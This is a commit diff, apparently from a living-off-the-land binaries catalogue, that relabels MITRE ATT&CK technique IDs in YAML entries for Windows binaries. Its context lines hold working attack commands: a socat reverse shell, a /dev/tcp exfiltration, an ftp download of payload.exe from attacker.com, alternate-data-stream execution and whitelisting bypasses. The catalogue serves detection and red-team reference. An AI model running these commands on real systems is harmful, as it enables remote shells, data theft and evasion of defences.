More changes (mainly changing some T1218 instances to T1202)

This commit is contained in:
Wietze 2021-11-05 20:17:04 +00:00
parent 2577066af9
commit bc51cb4e03
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
10 changed files with 19 additions and 19 deletions

View File

@ -9,28 +9,28 @@ Commands:
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\bash.exe - Path: C:\Windows\System32\bash.exe

View File

@ -16,7 +16,7 @@ Commands:
Usecase: Use diskshadow to bypass defensive counter measures Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1003 MitreID: T1202
OperatingSystem: Windows server OperatingSystem: Windows server
Full_Path: Full_Path:
- Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\System32\diskshadow.exe

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: explorer.exe C:\Windows\System32\notepad.exe - Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 (Tested) OperatingSystem: Windows 10 (Tested)
Full_Path: Full_Path:
- Path: C:\Windows\explorer.exe - Path: C:\Windows\explorer.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Use forfiles to start a new process to evade defensive counter measures Usecase: Use forfiles to start a new process to evade defensive counter measures
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download Description: Download

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1216 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Gpscript /startup - Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1216 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\System32\gpscript.exe

View File

@ -16,7 +16,7 @@ Commands:
Usecase: Execute process with HH.exe Usecase: Execute process with HH.exe
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\hh.exe - Path: C:\Windows\System32\hh.exe

View File

@ -9,21 +9,21 @@ Commands:
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a \\server\payload.dll - Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant. Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file Usecase: Proxy execution of remote dll file
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant. Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files Usecase: Execution of CPL files
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe

View File

@ -9,10 +9,10 @@ Commands:
Usecase: Execute binary through proxy binary to evade defensive counter measurments Usecase: Execute binary through proxy binary to evade defensive counter measurments
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmde from remote server Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
Category: Execute Category: Execute
Privileges: User Privileges: User

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Proxy execution Usecase: Proxy execution
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216.001
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs